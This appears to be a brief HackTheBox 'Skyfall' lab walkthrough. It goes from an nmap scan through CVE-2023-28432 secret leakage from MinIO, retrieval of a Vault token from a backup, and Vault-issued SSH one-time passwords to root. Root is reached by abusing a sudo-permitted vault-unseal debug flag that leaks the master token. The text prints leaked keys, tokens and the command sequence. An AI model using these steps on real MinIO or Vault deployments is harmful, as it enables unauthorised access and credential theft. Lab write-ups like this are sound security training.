HackTheBox - Skyfall
Nmap result:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 10.10.11.254
Host is up (0.065s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.88 seconds
User
Find demo.skyfall.htb subdomain with ffuf.
Use CVE-2023-28432 to get MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD
mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0
mc ls --recursive --versions myminio
There are multiple version of home_backup.tar.gz with id. mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .
Retrieve VAULT token in .bashrc file
Exports paths
1
2
3
$ export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
$ export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
install vault binary
https://developer.hashicorp.com/vault/install
1
$ vault login
1
$ curl --header "X-Vault-Token: $VAULT_TOKEN" --request POST --data '{"ip":"10.10.11.254", "username":"askyy"}'
OR
1
$ vault write ssh/creds/dev_otp_key_role ip=10.10.11.254 username=askyy
Then,
1
ssh askyy@10.10.11.254
Enter key as a password got from above vault comand.
Root
1
2
3
4
5
$ sudo -l
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
1
$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml
this command create a file in user home dir but we dont have permission to read file
so crete a new dir and new file its name is debug.log
For example:-
1
$ mkdir /home/askyy/d1/debug.log
Run this command but output save my file
1
$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d /home/askyy/d1/debug.log
1
2
3
4
5
6
7
8
9
10
11
12
$ cat /home/askyy/d1/debug.log
2024/02/05 15:57:33 Initializing logger...
2024/02/05 15:57:33 Reading: /etc/vault-unseal.yaml
2024/02/05 15:57:33 Security Risk!
2024/02/05 15:57:33 Master token found in config: <you-Got-Master-Token>
2024/02/05 15:57:33 Found Vault node: [http://prd23-vault-internal.skyfall.htb](http://prd23-vault-internal.skyfall.htb/)
2024/02/05 15:57:33 Check interval: 5s
2024/02/05 15:57:33 Max checks: 5
2024/02/05 15:57:33 Establishing connection to Vault...
2024/02/05 15:57:33 Successfully connected to Vault: [http://prd23-vault-internal.skyfall.htb](http://prd23-vault-internal.skyfall.htb/)
2024/02/05 15:57:33 Checking seal status
2024/02/05 15:57:33 Vault sealed: false
After that get master token
Export paths with master token
1
2
3
$ export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
$ export VAULT_TOKEN="<your-master-token>"
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
1
$ curl --header "X-Vault-Token: $VAULT_TOKEN" --request POST --data '{"ip":"10.10.11.254", "username":"root"}' $VAULT_ADDR/v1/ssh/creds/admin_otp_key_role
OR
1
$ vault write ssh/creds/admin_otp_key_role ip=10.10.11.254 username=root
1
$ ssh root@10.10.11.254
And boom we got root on the machine!!!